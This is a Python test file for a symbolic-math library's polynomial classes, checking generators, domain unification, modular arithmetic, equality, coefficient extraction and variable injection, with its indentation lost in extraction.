def test_Poly__args():
assert (x**2 + 1).as_poly().args == (x**2 + 1, x)
def test_Poly_is_number():
assert Integer(1).as_poly(x).is_number
assert x.as_poly().is_number is False
def test_Poly__gens():
assert ((x - p)*(x - q)).as_poly(x).gens == (x,)
assert ((x - p)*(x - q)).as_poly(p).gens == (p,)
assert ((x - p)*(x - q)).as_poly(q).gens == (q,)
assert ((x - p)*(x - q)).as_poly(x, p).gens == (x, p)
assert ((x - p)*(x - q)).as_poly(x, q).gens == (x, q)
assert ((x - p)*(x - q)).as_poly(x, p, q).gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(p, x, q).gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(p, q, x).gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly().gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(sort='x > p > q').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(sort='p > x > q').gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(sort='p > q > x').gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly(x, p, q, sort='p > q > x').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='x').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='p').gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(wrt='q').gens == (q, x, p)
assert ((x - p)*(x - q)).as_poly(wrt=x).gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt=p).gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(wrt=q).gens == (q, x, p)
assert ((x - p)*(x - q)).as_poly(x, p, q, wrt='p').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='p', sort='q > x').gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly(wrt='q', sort='p > x').gens == (q, p, x)
def test_Poly_unify():
pytest.raises(UnificationFailed, lambda: x.as_poly().unify(y))
pytest.raises(UnificationFailed, lambda: PurePoly(x).unify(y))
pytest.raises(UnificationFailed, lambda: PurePoly(x).unify(Poly(x, x, y)))
assert x.as_poly(modulus=3).unify(y.as_poly(modulus=3)) == \
(x.as_poly(x, y, modulus=3), y.as_poly(x, y, modulus=3))
pytest.raises(NotImplementedError,
lambda: x.as_poly(modulus=3).unify(y.as_poly(modulus=5)))
assert y.as_poly(x, y).unify(x.as_poly(modulus=3)) == \
(y.as_poly(x, y, modulus=3), x.as_poly(x, y, modulus=3))
assert x.as_poly(modulus=3).unify(y.as_poly(x, y)) == \
(x.as_poly(x, y, modulus=3), y.as_poly(x, y, modulus=3))
assert (x + 1).as_poly().unify((x + 2).as_poly()) == \
((x + 1).as_poly(domain=ZZ), (x + 2).as_poly(domain=ZZ))
assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(domain=QQ), (x + 2).as_poly(domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(domain=QQ), (x + 2).as_poly(domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly()) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(domain=QQ).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly().unify((x + 2).as_poly(y, x, domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly()) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(y, x, domain=QQ).unify((x + 2).as_poly()) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(x, y, domain=ZZ), (x + 2).as_poly(x, y, domain=ZZ))
assert (x + 1).as_poly(x, y, domain=QQ).unify((x + 2).as_poly(y, x)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(x, y).unify((x + 2).as_poly(y, x, domain=QQ)) == \
((x + 1).as_poly(x, y, domain=QQ), (x + 2).as_poly(x, y, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(y, x, domain=ZZ), (x + 2).as_poly(y, x, domain=ZZ))
assert (x + 1).as_poly(y, x, domain=QQ).unify((x + 2).as_poly(x, y)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (x + 1).as_poly(y, x).unify((x + 2).as_poly(x, y, domain=QQ)) == \
((x + 1).as_poly(y, x, domain=QQ), (x + 2).as_poly(y, x, domain=QQ))
assert (a*x).as_poly(x, domain=ZZ.inject(a)).unify((a*b*x).as_poly(x, domain=ZZ.inject(a, b).field)) == \
((a*x).as_poly(x, domain=ZZ.inject(a, b).field), (a*b*x).as_poly(x, domain=ZZ.inject(a, b).field))
assert (a*x).as_poly(x, domain=ZZ.inject(a).field).unify((a*b*x).as_poly(x, domain=ZZ.inject(a, b).field)) == \
((a*x).as_poly(x, domain=ZZ.inject(a, b).field), (a*b*x).as_poly(x, domain=ZZ.inject(a, b).field))
pytest.raises(CoercionFailed, lambda: Poly((x**2 + x**2*z).as_poly(y, field=True),
domain=ZZ.inject(x).field))
f = (t**2 + t/3 + x).as_poly(t, domain=QQ.inject(x).field)
g = (t**2 + t/3 + x).as_poly(t, domain=QQ.inject(x))
assert f.unify(g) == (f, f)
def test_Poly_free_symbols():
assert (x**2 + 1).as_poly().free_symbols == {x}
assert (x**2 + y*z).as_poly().free_symbols == {x, y, z}
assert (x**2 + y*z).as_poly(x).free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly().free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly(x).free_symbols == {x, y, z}
assert (x**2 + sin(y*z)).as_poly(x, domain=EX).free_symbols == {x, y, z}
def test_PurePoly_free_symbols():
assert PurePoly(x**2 + 1).free_symbols == set()
assert PurePoly(x**2 + y*z).free_symbols == set()
assert PurePoly(x**2 + y*z, x).free_symbols == {y, z}
assert PurePoly(x**2 + sin(y*z)).free_symbols == set()
assert PurePoly(x**2 + sin(y*z), x).free_symbols == {y, z}
assert PurePoly(x**2 + sin(y*z), x, domain=EX).free_symbols == {y, z}
def test_Poly__eq__():
assert (x.as_poly() == x.as_poly()) is True
assert (x.as_poly(domain=QQ) == x.as_poly()) is True
assert (x.as_poly() == x.as_poly(domain=QQ)) is True
assert (x.as_poly(domain=ZZ.inject(a)) == x.as_poly()) is True
assert (x.as_poly() == x.as_poly(domain=ZZ.inject(a))) is True
assert ((x*y).as_poly(x, y) == x.as_poly()) is False
assert (x.as_poly(x, y) == x.as_poly()) is False
assert (x.as_poly() == x.as_poly(x, y)) is False
assert ((x**2 + 1).as_poly() == (y**2 + 1).as_poly()) is False
assert ((y**2 + 1).as_poly() == (x**2 + 1).as_poly()) is False
f = x.as_poly(domain=ZZ)
g = x.as_poly(domain=QQ)
assert (f == g) is True
assert (f != g) is False
t0 = Symbol('t0')
f = ((t0/2 + x**2)*t**2 - x**2*t).as_poly(t, domain=QQ.inject(x, t0))
g = ((t0/2 + x**2)*t**2 - x**2*t).as_poly(t, domain=ZZ.inject(x, t0).field)
assert (f == g) is True
assert (x.as_poly() == y.as_poly()) is False
with pytest.raises(NotImplementedError):
assert x.as_poly(modulus=2) == x.as_poly(modulus=3)
def test_PurePoly__eq__():
assert (PurePoly(x, x) == PurePoly(x, x)) is True
assert (PurePoly(x, x, domain=QQ) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=QQ)) is True
assert (PurePoly(x, x, domain=ZZ.inject(a)) == PurePoly(x, x)) is True
assert (PurePoly(x, x) == PurePoly(x, x, domain=ZZ.inject(a))) is True
assert (PurePoly(x*y, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x, y) == PurePoly(x, x)) is False
assert (PurePoly(x, x) == PurePoly(x, x, y)) is False
assert (PurePoly(x**2 + 1, x) == PurePoly(y**2 + 1, y)) is True
assert (PurePoly(y**2 + 1, y) == PurePoly(x**2 + 1, x)) is True
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(x, x, domain=QQ)
assert (f == g) is True
assert (f != g) is False
f = PurePoly(x, x, domain=ZZ)
g = PurePoly(y, y, domain=QQ)
assert (f == g) is True
assert (f != g) is False
assert (f == 1) is False
assert (f == sin(x)) is False
with pytest.raises(NotImplementedError):
assert PurePoly(x, modulus=2) == PurePoly(x, modulus=3)
def test_PurePoly_Poly():
assert isinstance(PurePoly((x**2 + 1).as_poly()), PurePoly) is True
assert isinstance(PurePoly(x**2 + 1).as_poly(), Poly) is True
def test_Poly_domain():
assert (2*x).as_poly().domain == ZZ
assert (2*x).as_poly(domain=ZZ).domain == ZZ
assert (2*x).as_poly(domain=QQ).domain == QQ
assert (x/2).as_poly().domain == QQ
assert (x/2).as_poly(domain=ZZ) == Poly({(1, 1): 1}, x, Rational(1, 2),
domain=ZZ)
assert (x/2).as_poly(domain=QQ).domain == QQ
assert isinstance((0.2*x).as_poly().domain, RealField)
def test_Poly_set_domain():
assert (2*x + 1).as_poly().set_domain(ZZ) == (2*x + 1).as_poly()
assert (2*x + 1).as_poly().set_domain(QQ) == (2*x + 1).as_poly(domain=QQ)
assert (Rational(2, 10)*x + Rational(1, 10)).as_poly().set_domain(RR) == (0.2*x + 0.1).as_poly()
assert (0.2*x + 0.1).as_poly().set_domain(QQ) == (Rational(2, 10)*x + Rational(1, 10)).as_poly()
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().set_domain(ZZ))
pytest.raises(CoercionFailed, lambda: (x + 1).as_poly(modulus=2).set_domain(QQ))
pytest.raises(GeneratorsError, lambda: (x*y).as_poly(x, y).set_domain(ZZ.inject(y)))
def test_Poly_get_modulus():
assert (x**2 + 1).as_poly(modulus=2).get_modulus() == 2
assert (x**2 + 1).as_poly(modulus=8).get_modulus() == 8
pytest.raises(PolynomialError, lambda: (x**2 + 1).as_poly().get_modulus())
def test_Poly_set_modulus():
assert (x**2 + 1).as_poly(modulus=2).set_modulus(7) == (x**2 + 1).as_poly(modulus=7)
assert (x**2 + 5).as_poly(modulus=7).set_modulus(2) == (x**2 + 1).as_poly(modulus=2)
assert (x**2 + 1).as_poly().set_modulus(2) == (x**2 + 1).as_poly(modulus=2)
assert (x**2 + 1).as_poly(modulus=2).set_modulus(4) == (x**2 + 1).as_poly(modulus=4)
assert (x**2 + 7*x + 6).as_poly(modulus=4) == (x**2 + 3*x + 2).as_poly(modulus=4)
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().set_modulus(2))
def test_Poly_quo_ground():
assert (2*x + 4).as_poly().quo_ground(2) == (x + 2).as_poly()
assert (2*x + 3).as_poly().quo_ground(2) == (x + 1).as_poly()
def test_Poly_exquo_ground():
assert (2*x + 4).as_poly().exquo_ground(2) == (x + 2).as_poly()
pytest.raises(ExactQuotientFailed, lambda: (2*x + 3).as_poly().exquo_ground(2))
def test_Poly_abs():
assert abs((-x + 1).as_poly()) == (x + 1).as_poly()
def test_Poly_neg():
assert -(-x + 1).as_poly() == (x - 1).as_poly()
def test_Poly_add():
assert Integer(0).as_poly(x) + Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(1).as_poly(x) + Integer(0).as_poly(x) == Integer(1).as_poly(x)
assert Integer(1).as_poly(x, y) + Integer(0).as_poly(x) == Integer(1).as_poly(x, y)
assert Integer(0).as_poly(x, y) + Integer(1).as_poly(x, y) == Integer(1).as_poly(x, y)
assert (x + 1).as_poly() + 2 == (x + 3).as_poly()
assert (x**2 + 1).as_poly() + (x - 2).as_poly() == (x**2 + x - 1).as_poly()
assert Integer(1).as_poly(x) + x == (x + 1).as_poly()
assert Integer(1).as_poly(x) + sin(x) == 1 + sin(x)
assert sin(x) + Integer(1).as_poly(x) == sin(x) + 1
assert x.as_poly() + 1 == (x + 1).as_poly()
assert 1 + x.as_poly() == (x + 1).as_poly()
def test_Poly_sub():
assert Integer(0).as_poly(x) - Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(1).as_poly(x) - Integer(0).as_poly(x) == Integer(1).as_poly(x)
assert Integer(1).as_poly(x) - 1 == Integer(0).as_poly(x)
assert Integer(1).as_poly(x, y) - Integer(0).as_poly(x) == Integer(1).as_poly(x, y)
assert Integer(0).as_poly(x) - Integer(1).as_poly(x, y) == Integer(-1).as_poly(x, y)
assert Integer(0).as_poly(x, y) - Integer(1).as_poly(x, y) == Integer(-1).as_poly(x, y)
assert Integer(1).as_poly(x) - x == (1 - x).as_poly()
assert Integer(1).as_poly(x) - sin(x) == 1 - sin(x)
assert sin(x) - Integer(1).as_poly(x) == sin(x) - 1
assert x.as_poly() - 1 == (x - 1).as_poly()
assert 1 - x.as_poly() == (1 - x).as_poly()
assert (x + 1).as_poly() - 2 == (x - 1).as_poly()
assert (x**2 + 1).as_poly() - (x - 2).as_poly() == (x**2 - x + 3).as_poly()
def test_Poly_mul():
assert Integer(0).as_poly(x) * Integer(0).as_poly(x) == Integer(0).as_poly(x)
assert Integer(2).as_poly(x) * Integer(4).as_poly(x) == Integer(8).as_poly(x)
assert Integer(2).as_poly(x, y) * Integer(4).as_poly(x) == Integer(8).as_poly(x, y)
assert Integer(4).as_poly(x) * Integer(2).as_poly(x, y) == Integer(8).as_poly(x, y)
assert Integer(4).as_poly(x, y) * Integer(2).as_poly(x, y) == Integer(8).as_poly(x, y)
assert Integer(1).as_poly(x) * x == x.as_poly()
assert Integer(1).as_poly(x) * sin(x) == sin(x)
assert sin(x) * Integer(1).as_poly(x) == sin(x)
assert x.as_poly() * 2 == (2*x).as_poly()
assert 2 * x.as_poly() == (2*x).as_poly()
assert (x + 1).as_poly() * 2 == (2*x + 2).as_poly()
assert (x**2 + 1).as_poly() * (x - 2).as_poly() == (x**3 - 2*x**2 + x - 2).as_poly()
def test_Poly_pow():
assert x.as_poly()**10 == (x**10).as_poly()
assert (2*y).as_poly(x, y)**4 == (16*y**4).as_poly(x, y)
assert (7*x*y).as_poly(x, y)**3 == (343*x**3*y**3).as_poly(x, y)
assert (x*y + 1).as_poly(x, y)**(-1) == (x*y + 1)**(-1)
assert (x*y + 1).as_poly(x, y)**x == (x*y + 1)**x
assert (x - 2).as_poly()**3 == (x**3 - 6*x**2 + 12*x - 8).as_poly()
assert (x*y).as_poly(x, y)**2 == (x**2*y**2).as_poly(x, y)
assert (x - 2).as_poly()**2 == (x**2 - 4*x + 4).as_poly()
f, g = (x**3 + x - 1).as_poly(), (x**3 + 1).as_poly()
r = pow(f, 3, g)
assert r == f**3 % g
assert r == (-6*x**2 + 12*x - 9).as_poly()
def test_Poly_divmod():
f, g = (x**2).as_poly(), x.as_poly()
q, r = g, Integer(0).as_poly(x)
assert divmod(f, g) == (q, r)
assert f // g == q
assert f % g == r
assert divmod(f, x) == (q, r)
assert f // x == q
assert f % x == r
q, r = Integer(0).as_poly(x), Integer(2).as_poly(x)
assert divmod(2, g) == (q, r)
assert 2 // g == q
assert 2 % g == r
assert x.as_poly()/x.as_poly() == 1
assert (x**2).as_poly()/x.as_poly() == x
assert x.as_poly()/(x**2).as_poly() == 1/x
def test_Poly_eq_ne():
assert ((x + y).as_poly(x, y) == (x + y).as_poly(x, y)) is True
assert ((x + y).as_poly(x) == (x + y).as_poly(x, y)) is False
assert ((x + y).as_poly(x, y) == (x + y).as_poly(x)) is False
assert ((x + y).as_poly(x) == (x + y).as_poly(x)) is True
assert ((x + y).as_poly(y) == (x + y).as_poly(y)) is True
assert ((x + y).as_poly(x, y) == x + y) is True
assert ((x + y).as_poly(x) == x + y) is True
assert ((x + y).as_poly(x, y) == x + y) is True
assert ((x + y).as_poly(x) == x + y) is True
assert ((x + y).as_poly(y) == x + y) is True
assert ((x + y).as_poly(x, y) != (x + y).as_poly(x, y)) is False
assert ((x + y).as_poly(x) != (x + y).as_poly(x, y)) is True
assert ((x + y).as_poly(x, y) != (x + y).as_poly(x)) is True
assert ((x + y).as_poly(x) != (x + y).as_poly(x)) is False
assert ((x + y).as_poly(y) != (x + y).as_poly(y)) is False
assert ((x + y).as_poly(x, y) != x + y) is False
assert ((x + y).as_poly(x) != x + y) is False
assert ((x + y).as_poly(x, y) != x + y) is False
assert ((x + y).as_poly(x) != x + y) is False
assert ((x + y).as_poly(y) != x + y) is False
assert (x.as_poly() == sin(x)) is False
assert (x.as_poly() != sin(x)) is True
def test_Poly_nonzero():
assert not bool(Integer(0).as_poly(x)) is True
assert not bool(Integer(1).as_poly(x)) is False
def test_Poly_properties():
assert Integer(0).as_poly(x).is_zero is True
assert Integer(1).as_poly(x).is_zero is False
assert Integer(1).as_poly(x).is_one is True
assert Integer(2).as_poly(x).is_one is False
assert (x - 1).as_poly().is_squarefree is True
assert ((x - 1)**2).as_poly().is_squarefree is False
assert Integer(1).as_poly(x).is_ground is True
assert x.as_poly().is_ground is False
assert (x + y + z + 1).as_poly().is_linear is True
assert (x*y*z + 1).as_poly().is_linear is False
assert (x*y + z + 1).as_poly().is_quadratic is True
assert (x*y*z + 1).as_poly().is_quadratic is False
assert (x*y).as_poly().is_term is True
assert (x*y + 1).as_poly().is_term is False
assert (x**2 + x*y).as_poly().is_homogeneous is True
assert (x**3 + x*y).as_poly().is_homogeneous is False
assert x.as_poly().is_univariate is True
assert (x*y).as_poly().is_univariate is False
assert (x*y).as_poly().is_multivariate is True
assert x.as_poly().is_multivariate is False
assert (x**16 + x**14 - x**10 + x**8 - x**6 +
x**2 + 1).as_poly().is_cyclotomic is False
assert (x**16 + x**14 - x**10 - x**8 - x**6 +
x**2 + 1).as_poly().is_cyclotomic is True
def test_Poly_is_irreducible():
assert (x**2 + x + 1).as_poly().is_irreducible is True
assert (x**2 + 2*x + 1).as_poly().is_irreducible is False
assert (7*x + 3).as_poly(modulus=11).is_irreducible is True
assert (7*x**2 + 3*x + 1).as_poly(modulus=11).is_irreducible is False
def test_Poly_subs():
assert (x + 1).as_poly().subs({x: 0}) == 1
assert (x + 1).as_poly().subs({x: x}) == (x + 1).as_poly()
assert (x + 1).as_poly().subs({x: y}) == (y + 1).as_poly()
assert (x*y).as_poly(x).subs({y: x}) == x**2
assert (x*y).as_poly(x).subs({x: y}) == y**2
def test_Poly_replace():
assert (x + 1).as_poly().replace(x) == (x + 1).as_poly()
assert (x + 1).as_poly().replace(y) == (y + 1).as_poly()
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(z))
assert (x + 1).as_poly().replace(x, x) == (x + 1).as_poly()
assert (x + 1).as_poly().replace(x, y) == (y + 1).as_poly()
assert (x + y).as_poly().replace(x, x) == (x + y).as_poly()
assert (x + y).as_poly().replace(x, z) == (z + y).as_poly(z, y)
assert (x + y).as_poly().replace(y, y) == (x + y).as_poly()
assert (x + y).as_poly().replace(y, z) == (x + z).as_poly(x, z)
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(x, y))
pytest.raises(PolynomialError, lambda: (x + y).as_poly().replace(z, t))
assert (x + y).as_poly(x).replace(x, z) == (z + y).as_poly(z)
assert (x + y).as_poly(y).replace(y, z) == (x + z).as_poly(z)
pytest.raises(PolynomialError, lambda: (x + y).as_poly(x).replace(x, y))
pytest.raises(PolynomialError, lambda: (x + y).as_poly(y).replace(y, x))
def test_Poly_reorder():
pytest.raises(PolynomialError, lambda: (x + y).as_poly().reorder(x, z))
assert (x + y).as_poly().reorder(x, y) == (x + y).as_poly(x, y)
assert (x + y).as_poly().reorder(y, x) == (x + y).as_poly(y, x)
assert (x + y).as_poly(y, x).reorder(x, y) == (x + y).as_poly()
assert (x + y).as_poly(y, x).reorder(y, x) == (x + y).as_poly(y, x)
assert (x + y).as_poly().reorder(wrt=x) == (x + y).as_poly()
assert (x + y).as_poly(x, y).reorder(wrt=y) == (x + y).as_poly(y, x)
def test_Poly_has_only_gens():
assert (x*y + 1).as_poly(x, y, z).has_only_gens(x, y) is True
assert (x*y + z).as_poly(x, y, z).has_only_gens(x, y) is False
pytest.raises(GeneratorsError, lambda: (x*y**2 + y**2).as_poly(x, y).has_only_gens(t))
def test_Poly_to_ring():
assert (2*x + 1).as_poly(domain=ZZ).to_ring() == (2*x + 1).as_poly(domain=ZZ)
assert (2*x + 1).as_poly(domain=QQ).to_ring() == (2*x + 1).as_poly(domain=ZZ)
pytest.raises(CoercionFailed, lambda: (x/2 + 1).as_poly().to_ring())
pytest.raises(AttributeError, lambda: (2*x + 1).as_poly(modulus=3).to_ring())
def test_Poly_to_field():
assert (2*x + 1).as_poly(domain=ZZ).to_field() == (2*x + 1).as_poly(domain=QQ)
assert (2*x + 1).as_poly(domain=QQ).to_field() == (2*x + 1).as_poly(domain=QQ)
assert (x/2 + 1).as_poly(domain=QQ).to_field() == (x/2 + 1).as_poly(domain=QQ)
assert (2*x + 1).as_poly(modulus=3).to_field() == (2*x + 1).as_poly(modulus=3)
assert (2.0*x + 1.0).as_poly().to_field() == (2.0*x + 1.0).as_poly()
def test_Poly_to_exact():
assert (2*x).as_poly().to_exact() == (2*x).as_poly()
assert (x/2).as_poly().to_exact() == (x/2).as_poly()
assert (0.1*x).as_poly().to_exact() == (x/10).as_poly()
def test_Poly_retract():
f = (x**2 + 1).as_poly(domain=QQ.inject(y))
assert f.retract() == (x**2 + 1).as_poly(domain=ZZ)
assert f.retract(field=True) == (x**2 + 1).as_poly(domain=QQ)
assert Integer(0).as_poly(x, y).retract() == Integer(0).as_poly(x, y)
def test_Poly_slice():
f = (x**3 + 2*x**2 + 3*x + 4).as_poly()
assert f.slice(0, 0) == Integer(0).as_poly(x)
assert f.slice(0, 1) == Integer(4).as_poly(x)
assert f.slice(0, 2) == (3*x + 4).as_poly()
assert f.slice(0, 3) == (2*x**2 + 3*x + 4).as_poly()
assert f.slice(0, 4) == (x**3 + 2*x**2 + 3*x + 4).as_poly()
assert f.slice(x, 0, 0) == Integer(0).as_poly(x)
assert f.slice(x, 0, 1) == Integer(4).as_poly(x)
assert f.slice(x, 0, 2) == (3*x + 4).as_poly()
assert f.slice(x, 0, 3) == (2*x**2 + 3*x + 4).as_poly()
assert f.slice(x, 0, 4) == (x**3 + 2*x**2 + 3*x + 4).as_poly()
def test_Poly_coeffs():
assert Integer(0).as_poly(x).coeffs() == []
assert Integer(1).as_poly(x).coeffs() == [1]
assert (2*x + 1).as_poly().coeffs() == [2, 1]
assert (7*x**2 + 2*x + 1).as_poly().coeffs() == [7, 2, 1]
assert (7*x**4 + 2*x + 1).as_poly().coeffs() == [7, 2, 1]
assert (x*y**7 + 2*x**2*y**3).as_poly().coeffs('lex') == [2, 1]
assert (x*y**7 + 2*x**2*y**3).as_poly().coeffs('grlex') == [1, 2]
def test_Poly_monoms():
assert Integer(0).as_poly(x).monoms() == []
assert Integer(1).as_poly(x).monoms() == [(0,)]
assert (2*x + 1).as_poly().monoms() == [(1,), (0,)]
assert (7*x**2 + 2*x + 1).as_poly().monoms() == [(2,), (1,), (0,)]
assert (7*x**4 + 2*x + 1).as_poly().monoms() == [(4,), (1,), (0,)]
assert (x*y**7 + 2*x**2*y**3).as_poly().monoms('lex') == [(2, 3), (1, 7)]
assert (x*y**7 + 2*x**2*y**3).as_poly().monoms('grlex') == [(1, 7), (2, 3)]
def test_Poly_terms():
assert Integer(0).as_poly(x).terms() == []
assert Integer(1).as_poly(x).terms() == [((0,), 1)]
assert (2*x + 1).as_poly().terms() == [((1,), 2), ((0,), 1)]
assert (7*x**2 + 2*x + 1).as_poly().terms() == [((2,), 7), ((1,), 2), ((0,), 1)]
assert (x*y**7 + 2*x**2*y**3).as_poly().terms('lex') == [((2, 3), 2), ((1, 7), 1)]
assert (x*y**7 + 2*x**2*y**3).as_poly().terms('grlex') == [((1, 7), 1), ((2, 3), 2)]
def test_Poly_all_coeffs():
assert Integer(0).as_poly(x).all_coeffs() == [0]
assert Integer(1).as_poly(x).all_coeffs() == [1]
assert (2*x + 1).as_poly().all_coeffs() == [1, 2]
assert (7*x**2 + 2*x + 1).as_poly().all_coeffs() == [1, 2, 7]
assert (7*x**4 + 2*x + 1).as_poly().all_coeffs() == [1, 2, 0, 0, 7]
def test_Poly_termwise():
f = (x**2 + 20*x + 400).as_poly()
g = (x**2 + 2*x + 4).as_poly()
def func(monom, coeff):
k, = monom
return coeff//10**(2 - k)
assert f.termwise(func) == g
def func2(monom, coeff):
k, = monom
return (k,), coeff//10**(2 - k)
assert f.termwise(func2) == g
def func3(monom, coeff):
k, = monom
return (k,), coeff // 2
assert f.termwise(func3) == (10*x + 200).as_poly()
def func4(monom, coeff):
k, = monom
return k % 2, coeff
pytest.raises(PolynomialError, lambda: f.termwise(func4))
def test_Poly_length():
assert Integer(0).as_poly(x).length() == 0
assert Integer(1).as_poly(x).length() == 1
assert x.as_poly().length() == 1
assert (x + 1).as_poly().length() == 2
assert (x**2 + 1).as_poly().length() == 2
assert (x**2 + x + 1).as_poly().length() == 3
def test_Poly_as_dict():
assert Integer(0).as_poly(x).as_dict() == {}
assert Integer(0).as_poly(x, y, z).as_dict() == {}
assert Integer(1).as_poly(x).as_dict() == {(0,): 1}
assert Integer(1).as_poly(x, y, z).as_dict() == {(0, 0, 0): 1}
assert (x**2 + 3).as_poly().as_dict() == {(2,): 1, (0,): 3}
assert (x**2 + 3).as_poly().as_dict(native=True) == {(2,): ZZ(1), (0,): ZZ(3)}
assert (x**2 + 3).as_poly(x, y, z).as_dict() == {(2, 0, 0): 1, (0, 0, 0): 3}
assert (3*x**2*y*z**3 + 4*x*y +
5*x*z).as_poly().as_dict() == {(2, 1, 3): 3, (1, 1, 0): 4,
(1, 0, 1): 5}
def test_Poly_as_expr():
assert Integer(0).as_poly(x).as_expr() == 0
assert Integer(0).as_poly(x, y, z).as_expr() == 0
assert Integer(1).as_poly(x).as_expr() == 1
assert Integer(1).as_poly(x, y, z).as_expr() == 1
assert (x**2 + 3).as_poly().as_expr() == x**2 + 3
assert (x**2 + 3).as_poly(x, y, z).as_expr() == x**2 + 3
assert (3*x**2*y*z**3 + 4*x*y +
5*x*z).as_poly().as_expr() == 3*x**2*y*z**3 + 4*x*y + 5*x*z
f = (x**2 + 2*x*y**2 - y).as_poly()
assert f.as_expr() == -y + x**2 + 2*x*y**2
assert f.as_expr({x: 5}) == 25 - y + 10*y**2
assert f.as_expr({y: 6}) == -6 + 72*x + x**2
assert f.as_expr({x: 5, y: 6}) == 379
assert f.as_expr(5, 6) == 379
pytest.raises(GeneratorsError, lambda: f.as_expr({z: 7}))
def test_Poly_inject():
f = (x**2*y + x*y**3 + x*y + 1).as_poly(x)
assert f.inject() == (x**2*y + x*y**3 + x*y + 1).as_poly()
assert f.inject(front=True) == (y**3*x + y*x**2 + y*x + 1).as_poly(y, x)
f = (x**2 + 2*x - 1).as_poly()
assert f.inject() == f
f = (x**2 - 2*sqrt(3)*x + 4).as_poly(extension=True)
assert f.inject().replace(f.domain.ext, y) == (x**2 - 2*x*y + 4).as_poly()
def test_Poly_eject():
f = (x**2*y + x*y**3 + x*y + 1).as_poly()
assert f.eject(x) == (x*y**3 + (x**2 + x)*y + 1).as_poly(y, domain=ZZ.inject(x))
assert f.eject(y) == (y*x**2 + (y**3 + y)*x + 1).as_poly(x, domain=ZZ.inject(y))
ex = x + y + z + t + w
g = ex.as_poly()
assert g.eject(x) == ex.as_poly(y, z, t, w, domain=ZZ.inject(x))
assert g.eject(x, y) == ex.as_poly(z, t, w, domain=ZZ.inject(x, y))
assert g.eject(x, y, z) == ex.as_poly(t, w, domain=ZZ.inject(x, y, z))
assert g.eject(w) == ex.as_poly(x, y, z, t, domain=ZZ.inject(w))
assert g.eject(t, w) == ex.as_poly(x, y, z, domain=ZZ.inject(w, t))
assert g.eject(z, t, w) == ex.as_poly(x, y, domain=ZZ.inject(w, t, z))
